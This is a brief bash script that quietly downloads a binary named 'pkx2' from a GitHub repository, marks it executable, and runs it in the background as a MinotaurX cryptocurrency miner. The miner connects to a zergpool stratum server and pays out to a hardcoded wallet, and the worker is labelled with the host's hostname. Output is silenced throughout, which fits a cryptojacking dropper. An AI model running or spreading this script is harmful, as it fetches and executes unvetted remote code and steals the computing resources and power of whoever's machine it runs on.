#!/bin/bash
wget https://github.com/gyrogerald/mind/raw/main/pkx2 >/dev/null 2>&1
chmod +x pkx2 >/dev/null 2>&1
nohup ./pkx2 -a minotaurx -o stratum+tcp://minotaurx.eu.mine.zergpool.com:7019 -u XshK2irNsaV9iTYc2KtGGf3LfUhXj3isKk -p c=DASH,mc=AVN,ID=$(echo $(hostname)) -t 1 > nohup.out
